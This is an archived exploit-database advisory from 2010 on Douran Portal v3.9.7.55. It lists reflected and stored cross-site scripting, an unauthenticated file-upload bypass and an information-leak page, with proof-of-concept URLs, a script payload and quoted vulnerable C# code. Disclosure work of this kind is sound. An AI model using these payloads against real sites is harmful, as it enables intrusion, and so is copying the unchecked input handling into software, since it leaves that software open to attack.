Home / os / win7

[webapps / 0day] - Douran Portal <= v3.9.7.55 Multiple Re

Posted on 01 November 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Douran Portal &lt;= v3.9.7.55 Multiple Remote Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Douran Portal &lt;= v3.9.7.55 Multiple Remote Vulnerabilities by Itsecteam in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>========================================================== Douran Portal &lt;= v3.9.7.55 Multiple Remote Vulnerabilities ========================================================== [+] Author : ItSecTeam [+] Contact : Bug@itsecteam.com [+] Site : www.itsecteam.com [+] Forum : http://forum.itsecteam.com/ [+] Thanks : Amin Shokohi (Pejvak!) , homay ~~~~~~~~~~~~~~~~[Information]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Web App : Douran Portal [+] Version : Worked In Last Version (V3.9.7.55) And Prior [+] Software: http://www.douran.com [+][+][+][+][+][+][+](Vulnerabilities)[+][+][+][+][=][+][+] [1] Xss None Present : [~] Poc : Douran.dll:DouranPortal.DesktopModules.OrderForm private void Page_Load(object sender, EventArgs e) { this.lblTitle.Text = Localize.GetString(&quot;ORDER_FOR&quot;, &quot;Order form for&quot;) + &quot; &quot; + base.Request.QueryString[&quot;ItemTitle&quot;]; } Print Request.QueryString[&quot;ItemTitle&quot;] Without Check [~] Secure : private void Page_Load(object sender, EventArgs e) { this.lblTitle.Text = Localize.GetString(&quot;ORDER_FOR&quot;, &quot;Order form for&quot;) + &quot; &quot; + CheckString(base.Request.QueryString[&quot;ItemTitle&quot;]); } [-] End Poc [#] Exploit : http://Site.Com/DesktopModules/Gallery/OrderForm.aspx?itemtitle=&lt;script&gt;alert(&#039;ITSecTeam&#039;)&lt;/script&gt; [2] Remote File Upload : [Note] : Worked In Older 3.8.2.2 [~] Poc : You Can Upload Your File Without Check Authorization You Can Upload : string acceptedFiles = &quot;;.jpg;.jpeg;.jpe;.gif;.bmp;.png;.swf;.avi;.ra;.mov;.mpeg;.mpg;.wav;&quot;; You Can Bypass [-] End Poc [#] Exploit :http://Site.Com/DesktopModules/ftb/ftb.imagegallery.aspx[*] [3] Information Leakage Show Device Info : http://Site.Com/security/DeviceInfo.aspx [4] Xss Present : http://Site.Com/security/DeviceInfo.aspx [~] Poc : Douran.dll:DouranPortal.DesktopModules.BlogDB Submit Data Without Check{ blogDB.AddBlogComment(ModuleID, ItemID, this.txtName.Text,this.txtTitle.Text, this.txtURL.Text, this.txtComments.Text); } public void AddBlogComment(int moduleID, int itemID, string name, string title, string url, string comment) { if (name.Length &lt; 1) { name = &quot;unknown&quot;; } if (title.Length &gt; 100) { title = title.Substring(0, 100); } if (name.Length &gt; 100) { name = name.Substring(0, 100); } if (url.Length &gt; 200) { url = url.Substring(0, 200); } SqlConnection sqlConnectionString = PortalSettings.SqlConnectionString; SqlCommand command = new SqlCommand(&quot;dp_BlogCommentAdd&quot;, sqlConnectionString); command.CommandType = CommandType.StoredProcedure; SqlParameter parameter = new SqlParameter(&quot;@ModuleID&quot;, SqlDbType.Int, 4); parameter.Value = moduleID; command.Parameters.Add(parameter); SqlParameter parameter2 = new SqlParameter(&quot;@ItemID&quot;, SqlDbType.Int, 4); parameter2.Value = itemID; command.Parameters.Add(parameter2); SqlParameter parameter3 = new SqlParameter(&quot;@Name&quot;, SqlDbType.NVarChar, 100); parameter3.Value = name; command.Parameters.Add(parameter3); SqlParameter parameter4 = new SqlParameter(&quot;@Title&quot;, SqlDbType.NVarChar, 100); parameter4.Value = title; command.Parameters.Add(parameter4); SqlParameter parameter5 = new SqlParameter(&quot;@URL&quot;, SqlDbType.NVarChar, 200); parameter5.Value = url; command.Parameters.Add(parameter5); SqlParameter parameter6 = new SqlParameter(&quot;@Comment&quot;, SqlDbType.NText); parameter6.Value = comment; command.Parameters.Add(parameter6); sqlConnectionString.Open(); command.ExecuteNonQuery(); sqlConnectionString.Close();} [-] End Poc [#] Exploit :http://Site.Com/DesktopModules/Blog/BlogView.aspx # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-11-01]</pre></body></html>

 

TOP